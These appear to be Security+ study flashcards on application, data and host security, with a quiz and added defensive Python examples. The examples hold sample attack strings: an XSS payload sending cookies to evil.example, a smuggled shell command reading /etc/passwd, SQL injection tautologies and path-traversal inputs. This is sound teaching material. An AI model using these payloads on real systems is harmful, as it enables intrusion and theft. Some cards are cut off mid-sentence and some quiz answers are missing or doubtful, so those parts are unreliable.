Domain 4: Application, Data, and Host Security (16%)

Systems Security

Securing sensitive data against unauthorized access, and also protecting the integrity and availability of that data against malicious users and malicious software.

Virus

Malware that attaches itself to a host file or program and replicates when that host is run. It consists of an infection (delivery) mechanism and a payload, which is often destructive.

Boot Sector Virus

A type of virus which infects the boot sector (or master boot record) of a disk so that it loads before the operating system; it can prevent the OS from booting at all.

Companion Virus

A type of virus which creates a file with the same name as a legitimate program but a different extension that the OS searches for first (for example, a .COM file next to a .EXE), so the virus runs instead of, or before, the original program.

File-Infector Virus

A type of virus which infects executable files (such as .EXE or .COM files), either by overwriting them or by inserting its own code so that it runs whenever the file is executed.

Macro Virus

A type of virus written in the macro language of an application such as a word processor or spreadsheet. It runs automatically when an infected document is opened and spreads through documents rather than executables.

Memory-Resident Virus

A type of virus which loads itself into memory and stays resident after its host program exits. From there it infects other files as they are opened or run.

Polymorphic Virus

A type of virus which changes its appearance with each infection, typically by re-encrypting its body with a different key and varying the decryption routine, so that a fixed byte-pattern signature no longer matches even though the decrypted payload is unchanged.

Metamorphic Virus

A type of virus which rewrites its own code with each infection (reordering, substituting and inserting instructions), so that no fixed byte sequence, including the decryptor, survives from one generation to the next.

Stealth Virus

A type of virus which hides its presence by intercepting OS and application calls (for example, file reads or size checks) and returning the uninfected view of the file, redirecting commands around itself.

Trojan Horse

A program that appears to be something useful or legitimate but carries hidden malicious functionality. It typically installs back-door software that gives an attacker access to the client computer while bypassing normal authentication.

RAT (Remote Access Trojan)

A trojan that gives a remote attacker interactive control of the infected host (file access, keystroke capture, command execution). It runs with the privileges of the user who launched it and is often the foothold from which privilege escalation is attempted.

Logic Bombs

Malicious software that waits for a trigger event before it releases its payload.

Worms

An independent self-replicating program that spreads copies of itself to other computer systems via network connections, e-mail attachments, and instant messages.

Adware

Unsolicited software advertisements usually installed with a free or low-cost software program.

Spyware

Software that collects information about a user by tracking his activity without his knowledge or consent.

Rootkit

Software that hides the presence of an attacker or malware on a system by operating with root/administrator privileges and concealing files, processes and network connections from the OS and from security tools. Hosts compromised this way are often enrolled as bots in a botnet.

Back-Door Program

Any undisclosed means of access built into or installed on a system that lets someone bypass normal authentication and take control of the computer.

Firmware Rootkit

A rootkit embedded within the firmware of a device, such as a computer peripheral or network device.

Kernel Rootkit

A rootkit that runs inside the operating system kernel itself (for example, as a loaded driver or module), so it can alter what every other program on the system sees.

Persistent Rootkit

A rootkit that is stored on disk and reloads every time the system starts, so it survives shutdown and restart.

Application Rootkit

A rootkit that runs in system memory only while a specific application is active and writes nothing to disk, so it does not survive a shutdown and restart.

Library Rootkit

A rootkit that uses code library files, such as Windows DLLs, to intercept specific system and API calls and replace them with its own code.

Bot

A compromised computer running malware that places it under the control of an unauthorized remote operator.

Botnet

A collection of bots under the control of one unauthorized operator, typically directed through a command-and-control channel.

Bot Herder

Individual who controls a botnet.

DDoS (Distributed Denial-of-Service)

An attack on a system launched from multiple sources, intended to make a computer's resources or services unavailable to users. DDoS attacks are often launched from zombies (bots) in botnets and typically involve sustained, abnormally high network traffic. A performance

DoS (Denial-of-Service)

A type of attack that makes a server or service unavailable to legitimate clients, typically by flooding it with more requests or data than it can handle, or by crashing it with malformed input.

Security Baseline

A minimum standard that every system and application must meet: the least configuration that provides acceptable protection against security vulnerabilities and mitigates known threats and risks.

Security Templates and Policies

Provide a documented minimum configuration baseline for all of your server and workstation operating systems and applications.

Operating System Hardening

Keeping the OS and installed software patched, removing or disabling unnecessary services and software, and securely configuring what remains.

Service Packs

Cumulative collections of updates, fixes and patches rolled into a single installable package.

Signature

A byte pattern extracted from a known virus that anti-virus software uses as a unique identifier for it.

Signature Files

Contain the signatures of thousands of known viruses plus special algorithms (heuristics) for detecting common virus-like behaviors.
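An added example (not part of the original notes) that ties the Signature and Polymorphic Virus cards together: a toy signature scanner, a toy one-byte-XOR "polymorphic" wrapper, and a scanner that decodes before matching. The sample body, the signature database, the DECODER_STUB marker and the XOR scheme are all constructed for illustration and stand in for real engine internals.

```python
# Added example, not from the original page: why a byte-pattern signature
# misses a re-encoded (polymorphic) variant of the same payload.
import os

# Constructed "malware body" and a constructed signature-file entry for it.
SAMPLE_BODY = b"\x90\x90EVIL_PAYLOAD_v1\xcc\xcc"
SIGNATURES = {"Test.Sample": b"EVIL_PAYLOAD_v1"}
DECODER_STUB = b"DECODE:"   # assumed marker: "a decoder follows, then key, then body"


def scan(data, signatures=SIGNATURES):
    """Plain signature scan: names of every pattern found verbatim in data."""
    return [name for name, pattern in signatures.items() if pattern in data]


def polymorph(body, key=None):
    """Re-encode the body with a one-byte XOR key and prepend a decoder header.
    Each call with a different key yields different bytes, so a signature
    taken from the plain body no longer matches the variant."""
    if key is None:
        key = os.urandom(1)[0] | 1          # non-zero, so the body really changes
    encoded = bytes(b ^ key for b in body)
    return DECODER_STUB + bytes([key]) + encoded


def decode(variant):
    """What the variant does at run time: strip the header, XOR the body back."""
    assert variant.startswith(DECODER_STUB)
    key = variant[len(DECODER_STUB)]
    return bytes(b ^ key for b in variant[len(DECODER_STUB) + 1:])


def scan_with_emulation(data, signatures=SIGNATURES):
    """Scanner that recognises the decoder stub and scans the decoded body,
    the toy equivalent of the emulation/unpacking real engines do."""
    if data.startswith(DECODER_STUB):
        data = decode(data)
    return scan(data, signatures)


if __name__ == "__main__":
    v1 = polymorph(SAMPLE_BODY, 0x5A)
    v2 = polymorph(SAMPLE_BODY, 0x7F)
    print(scan(SAMPLE_BODY))            # ['Test.Sample']
    print(scan(v1), scan(v2), v1 != v2) # [] [] True: same payload, different bytes
    print(scan_with_emulation(v1))      # ['Test.Sample']
```

The plain scanner still catches the decrypted payload, which is why polymorphic code only defeats naive matching; a metamorphic virus, which rewrites the payload itself, would also defeat the emulating scanner.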

Cookies

Small files saved on your computer which store data for specific web sites you have visited.

HIDS - Host-Based Intrusion Detection System

A passive IDS used to monitor an individual server or workstation. Protects local resources on the host such as the operating system files.

HIPS - Host-Based Intrusion Prevention System

An extension of a host-based IDS designed to react in real time and block an attack while it is in progress. An active IDS.

AES (Advanced Encryption Standard)

A symmetric block cipher (128-bit blocks; 128-, 192- or 256-bit keys) that is the standard algorithm for encrypting data at rest, such as the contents of a laptop hard drive.

JavaScript

A scripting language created by Netscape whose code is interpreted by the web browser rather than compiled. It can read and modify the page's HTML (the DOM), enabling web authors to create web sites with dynamic content.

ActiveX

A Microsoft technology used to create reusable components across Windows web applications. Components can be downloaded to the computer through the web browser.

Buffer Overflow

Occurs when a program writes more data into a buffer than the buffer can hold, overwriting adjacent memory. Caused primarily by missing bounds checks on input, which lets an attacker corrupt data or redirect execution.

Privilege Escalation

An attacker exploits a security vulnerability, such as poor input validation in a software application, to obtain more privileged access to a computer system than was granted.

Proof-of-Concept Exploit

Code that demonstrates that a vulnerability in an application or operating system can actually be exploited. Once a vulnerability becomes known to the general public, malicious hackers can turn such code into working attacks.

Session Hijacking

When a user's session token (often a cookie that represents an authenticated session with a remote server) is captured or guessed by another user, who then presents it to gain unauthorized access as the victim.

CGI (Common Gateway Interface) Scripts

Programs designed to accept and return data that conforms to the CGI specification. The most common way for web servers to interact dynamically with users (like web forms).

XSS (Cross-Site Scripting)

A web application vulnerability that lets an attacker inject script into pages that other users view, typically through user input that the site reflects or stores without validation. Prevented by strong input validation and, above all, by encoding output for the context in which it is rendered.

XSRF or CSRF (Cross-Site Request Forgery)

A type of attack in which an attacker uses an unsuspecting user's current web browsing state, including session cookie data and login credentials, by tricking him into visiting a web site that contains malicious code. The hacker then uses the ses

Header Manipulation

A type of web application vulnerability where invalid or malicious data is inserted into HTTP headers, for example by placing CR/LF characters in a value that the server copies into a response header.

XML (Extensible Markup Language)

A markup language that uses tags to define the structure, storage, and transportation of data in web pages.

XML Injection Attack

An attack that supplies crafted input to change how an XML application parses or processes its data. Can be prevented through input validation and validation of documents against a schema.

Command Injection

When a malicious user enters OS-level commands into URL parameters or input forms that the server passes on to a shell, so the commands are executed on the server.
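As an added example (not from the original notes), a "ping this host" feature built the injectable way and the safe way. The hostname pattern, the validate_host helper and the sample input are assumptions made for this illustration; the point is that the safe version never hands user input to a shell and additionally rejects anything that is not a host.

```python
# Added example, not from the original page: command injection via shell=True
# versus an argv list with input validation.
import ipaddress
import re
import subprocess

# Assumed hostname rule: labels of letters, digits and '-', starting and
# ending with a letter or digit. A leading '-' cannot match, so the value
# can never be parsed by ping as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def validate_host(host):
    """Return the host if it is an IP literal or a DNS name, else raise ValueError."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def is_valid_host(host):
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def ping_command_unsafe(host):
    """Vulnerable: this string is meant for subprocess.run(cmd, shell=True),
    so ';', '|', '&&' and '$(...)' in host are interpreted by /bin/sh."""
    return f"ping -c 1 {host}"


def ping_command_safe(host):
    """Hardened: validate first, then build an argv list. With a list and no
    shell, the value reaches ping as a single argument no matter what it holds."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host, timeout=5):
    """Execute the safe form (not run in the demo below; needs ping and a network)."""
    return subprocess.run(ping_command_safe(host), capture_output=True,
                          text=True, timeout=timeout, check=False)


if __name__ == "__main__":
    evil = "8.8.8.8; cat /etc/passwd"          # constructed attacker input
    print(ping_command_unsafe(evil))           # ping -c 1 8.8.8.8; cat /etc/passwd
    print(ping_command_safe("example.com"))    # ['ping', '-c', '1', 'example.com']
    print(is_valid_host(evil), is_valid_host("-f"), is_valid_host("$(id)"))  # False ×3
```

If a shell truly cannot be avoided, shlex.quote() on each argument is the fallback, but validation plus an argv list removes the problem rather than escaping around it.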

Directory Traversal

A vulnerability in which an attacker uses path sequences such as ../ (often URL-encoded) to read files on a web server outside the directory of public files that the site is meant to serve.
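As an added example (not from the original notes), a path resolver that maps a requested URL path onto a document root and refuses anything that lands outside it. The document root and the request paths are constructed; the check is lexical only, and a real server would also realpath() the result so that symlinks inside the root cannot point outside it.

```python
# Added example, not from the original page: containing user-supplied paths
# under a document root to stop directory traversal.
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/www/public"   # assumed document root


def resolve_request_path(root, requested):
    """Map a URL path onto a path under root, or raise ValueError.

    1. percent-decode, so %2e%2e and %2F cannot slip past the check;
    2. reject NUL bytes, which truncate C strings in the filesystem layer;
    3. join and normalise, which is where an absolute path replaces the root
       and where ../ sequences collapse;
    4. confirm the result is the root itself or lies strictly beneath it.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise ValueError(f"path escapes document root: {requested!r}")
    return candidate


def is_safe(root, requested):
    try:
        resolve_request_path(root, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed request paths: the first two are legitimate, the rest are attacks.
    for p in ["index.html", "docs/../docs/a.txt", "../../etc/passwd",
              "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd", "docs/..%2F..%2Fetc/passwd"]:
        print(f"{p:30} -> {is_safe(WEB_ROOT, p)}")
```

Note the absolute-path case: posixpath.join(root, "/etc/passwd") silently discards the root, which is exactly why the containment check after normalisation is the part that matters.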

Zero-Day Attacks

An attack that exploits a vulnerability before the vendor has released a patch, and often before the vulnerability is publicly known. Because the attack is brand new, no signature or defense exists to detect it.

FTP (File Transfer Protocol) Servers

Servers used to transfer files from one system to another across the Internet. Credentials and data are sent over the network in clear text.

SFTP (Secure FTP)

A file transfer protocol that runs over SSH, so that authentication and file contents are encrypted and cannot be intercepted in transit between systems.

DNS (Domain Name System) Server

This server translates Internet domain names into IP addresses. Susceptible to DoS, malformed-query attacks, and DNS cache poisoning.

DHCP (Dynamic Host Configuration Protocol) Server

A server that automatically allocates IP addresses and other network settings to clients as they join the network. The protocol has no built-in authentication mechanism to allow or disallow clients.

MAC (Media Access Control) Addresses

As a countermeasure to rogue clients, DHCP servers can be configured to hand out addresses only to clients identified by their what? (Such reservations stop unknown devices from obtaining a lease, although this address is easily spoofed.)

Database Servers

Servers that contain relational data used as a back-end repository of information for front-end applications and web services.

SQL Injection

Insertion of SQL syntax through a front-end application's input fields so that the database executes a query the attacker controls, revealing or damaging confidential data.
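As an added example (not from the original notes), the same login lookup written twice against an in-memory SQLite table: once by building the SQL string from user input, once with bound parameters. The table, rows and attack strings are constructed; the plaintext passwords are only there to keep the demo short, and a real system would store hashes.

```python
# Added example, not from the original page: SQL injection against a
# string-built query, and the parameterised query that is immune to it.
import sqlite3


def make_db():
    """Constructed sample table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """The input is spliced into the SQL text, so quotes and comments in it
    become part of the query's syntax."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterised(conn, username, password):
    """The values are bound as parameters; the database only ever treats
    them as data, whatever characters they contain."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    tautology = "' OR '1'='1"        # constructed attack strings
    comment_out = "alice' --"
    print(login_vulnerable(conn, "alice", "s3cret"))          # [('alice', 'admin')]
    print(login_vulnerable(conn, "x", tautology))             # both rows: AND binds tighter than OR
    print(login_vulnerable(conn, comment_out, "anything"))    # [('alice', 'admin')]: password check commented away
    print(login_parameterised(conn, "x", tautology))          # []
    print(login_parameterised(conn, comment_out, "anything")) # []
```

The second attack shows why "just filter OR" is not a fix: the injection lives in the quote character and the comment marker, and parameterisation removes the whole class rather than individual strings.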

Directory Services

A repository of information about the users and resources of a network. To increase security, directory traffic should be carried over secured, encrypted protocols such as SSL/TLS (LDAPS).

LDAP Injection

Inserting LDAP filter syntax into user-supplied input that the application uses to build a query to an LDAP server.

E-Mail Servers

Servers that store incoming mail for users and are responsible for sending outbound mail from local users to their destination.

POP3 (Post Office Protocol Version 3)

An Internet protocol that provides a way for users to retrieve mail from their inboxes using a POP-enabled e-mail client. The e-mail messages are stored on the server until the user connects to it and downloads them to the e-mail client. Most accounts

IMAP (Internet Message Access Protocol)

Internet protocol used to provide a mechanism for receiving messages from a user's inbox. Gives the user more control over what messages they download and how it stores them online.

SSL (Secure Sockets Layer)

To protect the transfer of credentials from packet sniffers, what should Secure POP and Secure IMAP utilize to encrypt the login passwords?

SMTP (Simple Mail Transfer Protocol)

The e-mail message-exchange standard of the Internet for delivering e-mail to its destination server.

Enable SMTP authentication
Disable open SMTP relaying

What can be done to protect the SMTP server from abuse?

Input Validation

The process of coding applications to accept only certain valid input for user-entered fields and reject everything else.

Escaping

A technique that recognizes characters with special meaning to an interpreter (such as quotes, angle brackets, parentheses or shell metacharacters) and encodes them so that they are treated as plain data rather than as part of a command.
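As an added example (not from the original notes), covering the XSS, LDAP Injection and Escaping cards together: one attacker-controlled string rendered into an HTML page and another placed into an LDAP search filter, each with and without the escaping that its sink requires. The page template, the filter template and the two inputs are constructed for illustration.

```python
# Added example, not from the original page: escaping is context-specific.
# The HTML sink needs HTML entity encoding; the LDAP filter sink needs the
# RFC 4515 \XX escapes. Neither one protects the other context.
import html

# Constructed attacker inputs.
XSS_INPUT = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
LDAP_INPUT = "*)(uid=*"


def render_comment_unsafe(comment):
    """Vulnerable: the comment is concatenated straight into the page."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Hardened: encode & < > " ' so the browser shows the text, not a tag."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def ldap_filter_escape(value):
    """Escape a value for use inside an LDAP search filter: backslash, *, (, )
    and NUL become \\XX hex escapes (RFC 4515)."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def user_filter_unsafe(uid):
    """Vulnerable: the uid is spliced into the filter, so ')' closes the
    current assertion and the attacker appends his own."""
    return f"(&(objectClass=person)(uid={uid}))"


def user_filter_safe(uid):
    return f"(&(objectClass=person)(uid={ldap_filter_escape(uid)}))"


if __name__ == "__main__":
    print(render_comment_unsafe(XSS_INPUT))   # the script tag reaches the browser intact
    print(render_comment_safe(XSS_INPUT))     # &lt;script&gt;... is displayed as text
    print(user_filter_unsafe(LDAP_INPUT))     # (&(objectClass=person)(uid=*)(uid=*)) matches every person
    print(user_filter_safe(LDAP_INPUT))       # (&(objectClass=person)(uid=\2a\29\28uid=\2a)) matches nobody
```

html.escape() is correct for HTML element and attribute contexts only; a value dropped into a <script> block, a URL or a CSS rule needs that context's encoding instead, which is why templating engines ask which context they are emitting into.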

Fuzzing

A testing technique that can help test input validation and error/exception handling by entering random, unexpected data into application fields to see how the software program reacts.

Error and Exception Handling

Making sure that a program handles an error condition without crashing or leaking internal details, and either retains its state and continues to function or fails into a secure state.

Transitive Access

This occurs when you have access permissions or trusts between different components of a software application that allow user access to pass through unexpectedly and without proper authorization to access another software component.

Application Hardening

Techniques used to prevent application vulnerabilities from being exploited.

Data Loss Prevention (DLP)

The concept of using security and content control features to prevent confidential, private data from leaving your organization's networks.

TPM (Trusted Platform Module)

A hardware chip on a system's motherboard that provides hardware-based authentication and key protection by storing security material such as passwords, certificates, and encryption keys that are bound to that specific hardware. The chip contains a built-in RSA key used for encryption

TPM

This protects the key that encrypts a laptop's hard drive (for example, for BitLocker), releasing it only when the measured boot state matches, which is what lets the drive be encrypted without the user typing a long key.

HSM (Hardware Security Module)

A specialized hardware appliance used to provide on-board cryptographic functions and processing. Often used for banking applications such as ATMs.

Whole Disk Encryption

Encrypting the entire contents of a computer system's hard drive. Typically includes the disk volume with the OS data but not the master boot record.

Fuzzing

Which of the following will enter random data to the inputs of an application?

Input validation

Which of the following is specifically meant to ensure that a program operates on clean, correct and useful data?

Anti-virus software

Which of the following measures am I most likely to implement to protect against a worm or trojan horse?

Pop-up blocker

As I browse the Internet, I notice that when I go to some sites, multiple additional windows are opened automatically. Many of these windows contain advertisements for products that are inappropriate for my family to view. Which tool can I implement to

Group Policy / WSUS

Which of the following tools can I use on a Windows network to automatically distribute and install software and operating system patches on workstations? (select two)

Group Policy

I have contracted with a vendor to supply a custom application that runs on Windows Vista workstations. As new application versions and patches are released, I want to be able to automatically apply these to multiple computers. Which tool would be the best

Run a full scan

I have installed anti-malware software on a computer that only I use. I want to protect the computer from files that I download from the Internet. What should I do next to make sure that there aren't any existing files on my system that are infected

Hotfix

Which of the following terms describes a Windows operating system patch that corrects one specific, narrowly scoped problem and is released as soon as it is ready, rather than waiting for the next service pack or scheduled update cycle?

remote wipe

A smart phone was lost at the airport. There is no way to recover the device. Which of the following will ensure data confidentiality on the device?

Screen lock

Which of the following mobile device security consideration will disable the ability to use the device after a short period of inactivity?

Drive lock

Which of the following security measures encrypts the entire contents of a hard drive?

Bitlocker

I want a security solution that protects the entire hard drive, preventing access, even when it is moved to another system, Which solution would I choose?

EFS

Which of the following security solutions encrypts individual files so that a user other than the one who created them cannot read them?

Fuzzing

a process that tests programs for security vulnerabilities, bugs and errors through the use of a testing tool that feeds random, obscure, incorrect or malicious data into the application to determine the outcome.

Secure Coding Concepts

Developing secure code is a secure-by-design concept and requires developers and security experts to work collaboratively during each step of the software development lifecycle.

Error and exception Handling

when a serious error or failure occurs, a program can either fail closed (fail secure: deny the operation and stop) or fail open (continue as if the check had passed). How errors and exceptions are handled determines which of these happens.

Input validation

the practice of checking and sanitizing the data an application receives from users before acting on it.

Cross site Scripting Prevention

On the application side, validating input and encoding output for the context it is rendered in (this is the actual fix). On the client side, mitigations include running anti-malware, running a host-based IPS, locking down web browsing, and applying browser security patches promptly.

Cross Site Request Forgery Prevention

On the application side, requiring an unpredictable per-session anti-CSRF token on every state-changing request and setting the SameSite attribute on session cookies. On the client side: install protective browser add-ons, empty temporary internet files regularly, keep web browsers patched, log off sites when done, and avoid letting the browser remember logon information.
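As an added example (not from the original notes) for the CSRF cards: the server-side defense. A token derived from the session with an HMAC must accompany every state-changing request; the attacker's page can make the victim's browser send the cookie, but it cannot read the session or compute the token. The server key, the session ids, the request dictionaries and the handler are constructed stand-ins for a real web framework.

```python
# Added example, not from the original page: synchroniser-token CSRF
# protection plus a SameSite session cookie.
import hashlib
import hmac
import secrets

SERVER_KEY = b"constructed-server-key-change-me"   # assumed server-side secret


def csrf_token(session_id):
    """Token bound to the session: HMAC-SHA256(server_key, session_id).
    Without the session id (which HttpOnly keeps from scripts and which a
    cross-site page never sees) the token cannot be forged."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, submitted_token):
    if not submitted_token:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted_token)


def set_session_cookie(session_id):
    """Set-Cookie value: SameSite=Lax stops the browser attaching the cookie
    to cross-site POSTs at all, so even a missing token check would not
    be exploitable from another origin in modern browsers."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax"


def handle_transfer(request):
    """Constructed handler: the cookie carries the session, the form must
    carry the matching token. Returns the HTTP status line it would send."""
    session = request["cookies"].get("session")
    if session is None:
        return "401 not logged in"
    if not verify_csrf(session, request["form"].get("csrf_token")):
        return "403 CSRF check failed"
    return f"200 transferred {request['form']['amount']} to {request['form']['to']}"


if __name__ == "__main__":
    sid = "sess-" + secrets.token_hex(8)
    form = {"to": "mallory", "amount": "100"}
    legit = {"cookies": {"session": sid}, "form": {**form, "csrf_token": csrf_token(sid)}}
    forged = {"cookies": {"session": sid}, "form": form}   # browser added the cookie, page could not add the token
    print(set_session_cookie(sid))
    print(handle_transfer(legit))    # 200 ...
    print(handle_transfer(forged))   # 403 CSRF check failed
```

The token check is what protects users on browsers or cookie configurations that do not honour SameSite; the cookie attribute is the second layer. Both belong on the server, which is why the client-side tips above are mitigations rather than prevention.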

Application configuration baseline

a documented, known-good configuration for an application that serves as the reference point both for troubleshooting and for spotting insecure or unauthorized changes.

Application Hardening

preventing the use or enabling of specific features and tools; ensuring that certain options, such as auto-save, are always enabled; preventing the removal, installation or modification of the application; and so on.

Application Patch Management

the practice of routinely applying vendor updates and fixes to an application and to the system it runs on.

Patch Management

the practice of routinely acquiring, testing and applying patches to systems and applications.

BIOS

this firmware initializes the hardware and loads the operating system in a process called bootstrapping.

USB Devices

a specialized (malicious) USB device can disrupt operation or copy data transparently to the end user, which is why unused ports are often disabled or restricted by policy.

cable locks

used to physically secure laptops and almost any other equipment to a fixed object.

Host Software Baselining

the proper operating system version and configuration as well as the appropriate applications required to both protect the system and allow the users to perform their work.

Risk is reduced

if a device is configured to store data in the cloud rather than locally, because a lost or stolen device then holds less data.

1. Because RADIUS is an open architecture it can be expanded and customized individually by each customer.

- True

2. PPTP tunneling uses encapsulated PPP packets containing user information. Which of the choices listed below best describes those packets.
-UDP Packet
-IPX packet
-Control packet
-Compressed packet
-Data packet

- Data packet

3. WEP uses an asymmetrical key to identify wireless devices.

- False

4. Of the key sizes listed, which is not used by Twofish?
-129 bits
-128 bits
-256 bits
-192 bits

- 129 bits

5. Port-based network access control, which authenticates a device before the switch or access point port it is attached to will forward its traffic, is specified by which IEEE standard?
-802.1x
-802.5x
-802.31x
-802.2x

- 802.1x

6. Signed applets are usually given more privileges than ordinary applets.

- True

7. An attack that sends large amounts of data to a specific field in an application and thereby causes that application to stop performing its intended functions and execute commands on behalf of the attacker is known as what type of attack?
-Macro
-DoS
-

- Buffer Overflow

8. ESP protocol uses by default, which of the encryption types shown below?
-Symmetric
-Asymmetric

- Symmetric

9. What method listed below would be most effective in determining the optimal placement of wireless access points?
-War driving
-Wireless access points should be placed near the most influential employees
-A wireless site survey
-WLAN configuration tool

- A wireless site survey

10. S/MIME 3 and OpenPGP are designed to be interoperable.

- False

11. The acronym ESP corresponds to which choice listed below?
- Encapsulating Security Payload
-Encapsulated Security Payload
-Enterprise Security Perimeter
-None of these

- Encapsulating Security Payload

12. Which choice below best describes the networking technology that enables one network to send its data over another networks connections?
-RADIUS
-RAS
-VPN
-Tunneling

- Tunneling

13. Which of the following would not typically be used as a part of a digital signature?
-The owners private key
-The owners public key
-The owners name
-Digital signatures of a trusted third party
-The owners email address

- The owner's private key

14. Asymmetric encryption is used in conjunction with symmetric encryption by SSL/TLS.

- True

15. The key components of an SSH product are:
- The engine, the administration server, enrollment gateway, and the publishing server.
- The engine, the authentication server, enrollment gateway, and the publishing server.
- The engine, the authentication

- The engine, the administration server, enrollment gateway, and the publishing server.

16. File transfer programs and remote logon processes such as the FTP and Telnet can be replaced with which of the following choices?
-PPTP
-TFTP
-L2TP
-SSH

- SSH

17. Which layer of the WAP protocol stack corresponds to the transport layer of the OSI model?
-WTP
-WAL
-WAP
-WDP

- WDP

18. Which layer of the WAP protocol stack corresponds to the session layer of the OSI model?
-WTP
-WAL
-WAP
-WSP

- WSP

19. Establishing a site on your intranet that contains all authoritative information regarding viruses and other important warnings is part of an acceptable solution aimed at reducing hoaxes.

- True

20. What is the maximum transmission rate supported by the 802.11a standard?
-11 Mbps
-48 Mbps
-54Mbps
-56Mbps

- 54 Mbps

21. Which of the choices below represent the standard data transmission methods of the FTP protocol? (Choose all that apply)
-OpenFTP
-Anonymous FTP
-Active FTP
-Passive FTP
-Blind FTP

- Active FTP
- Passive FTP

22. S/MIME offers more security services than MIME. Two additional security services that are offered are authentication and privacy. Authentication is accomplished using digital signatures. How is privacy accomplished?
-Digital Certificates
-None of these

- Encryption

23. Anonymous FTP sites are an excellent tool for the distribution of software updates and patches.

- True

24. Using IPSec it is possible to create a VPN on the fly, on demand, and with anyone else using the standard.

- True

25. OpenPGP software is already integrated into both Microsoft and Netscape products.

- False

26. PPTP tunneling uses two basic packet types. Which choices below represent those packet types? ( choose two)
-Compressed packet
-Control packet
-IPX packet
-Data packet

- Control packet
- Data packet

27. PGP certificates are identical to X.509 Certificates.

- False

28. A message encrypted using the recipient's public key is decrypted by the recipient using which of the choices listed below?
-The recipients Private key
-None of these
-The recipients public key
-Both the recipients Private and Public Keys

- The recipients Private key

29. An LDAP server is not susceptible to major attacks like DoS because of its standards based methods of operation.

- False

30. Participating in a chain letter or perpetuating a hoax causes which of the events listed below?
-Damaged reputation
-Wasted time
-All of these
-Future messages being ignored

- All of these

31. There are typically two parts to a CGI script. Which choices below represent those parts? ( Choose all that apply)
- An HTML page that feeds the input to an executable
-The digital signature
-The CGI agent
-The java applet
- An executable program on t

- An HTML page that feeds the input to an executable
- An executable program on the server.

32. The LDAP directory is organized as a tree-like hierarchical structure. Which of the choices below represents the name of the structure?
-None of these
-Directory Information Tree
-Distinguished Information Tree
-Directory Individual Tree

- Directory Information Tree

34. An arbitrary 32 bit number that specifies the group of security protocols being used along with which algorithms and keys is referred to is which of the choices listed below?
-DES
-SPI
-DDS
-ESP

- SPI

35. Which choice below represents the simplest VPN solution?
-A VPN client computer with an internet connection through a firewall and the compatible server product
- A VPN client computer with internet connection and a compatible server product.
-The VPN

- A VPN client computer with internet connection and a compatible server product.

36. Which Protocol listed would be used to enable secure communication with a Web Server?
-SLS
-SSL
-SAD
-DAS

- SSL

37. The topmost level in the LDAP hierarchy is referred to as which choice below?
-SSO
-OU
-Root
-Home

- Root

38. Which 802.11 working group is responsible for fixing security flaws in WLANs?
-802.11b
-802.11d
-802.11i
-802.11c
-802.11a
-802.11g

- 802.11i

39. Which of the following is not a step taken to secure mail messages before they are sent using PGP and/or S/MIME?
-The plaintext message is compressed using ZIP technology (PGP only)
-The message is encrypted using the session key and symmetrical encry

- The recipients private key is added.

40. How many authentication classes does WTLS allow?
-4
-2
-1
-3

-3

41. The acronym HTTPS identifies which of the choices listed below?
-Hypertext Transport Protocol Secure
-Secure Hypertext transfer protocol
-Hypertext transfer Protocol Secure
-Secure Hypertext transport protocol

- Hypertext Transfer Protocol Secure

42. The Triple Data Encryption Standard (3DES) and the International Data Encryption Algorithm both use a 128 bit key.

- False

43. Buffer overflow attacks are easy to coordinate.

- False

44. Which WAP 2.0 feature allows content providers to send information directly to a WAP device without a request from that device?
-WAP TLS
-WAP Gap
-WAP MMS
-Wap Push

- Wap Push

45. TACACS+, the extended version of the Terminal Access Controller Access Control System, was developed by which company listed below?
-Red hat
-Microsoft
-Novell
-Cisco

- Cisco

46. Which of the choices below correctly identifies an open, global specification that is designed to deliver information and services to users of handheld digital wireless devices?
-WTLS
-WEP
-WAP
-IEEE

- WAP

47. Commonly found 40 and 56 bit web browsers are considered to have weak encryption because these key sizes can be cracked in a short period of time. Approximately how long would it take to crack a 40 bit key?
-1 day
-1 hour
-1 month
-1 week

- 1 week

48. OpenPGP is compatible with MIME and non-MIME e-mail formats. No special software is necessary.

- False

49. A PGP certificate can be generated locally by its owner, with no certification authority involved. Which choice below correctly identifies the type of certificate that must instead be requested from, and issued by, a certification authority?
-X.509 certificate
-3DES key
-All of these
-SHA-1 key

- X.509 certificate

50. SSL/TLS uses ciphers to provide the authentication of end points for end-to-end secure communication.

- False

51. The acronym CRL corresponds to which choice listed below?
-Certificate Reference List
-Committed Resource Locator
-Certificate Revocation List
-Common Resource list

- Certificate Revocation List

52. When attempting to connect to a RADIUS server the user will be prompted for a user name and password by which of the devices shown below?
-EAP
-VPN
-NAS
-SLIP

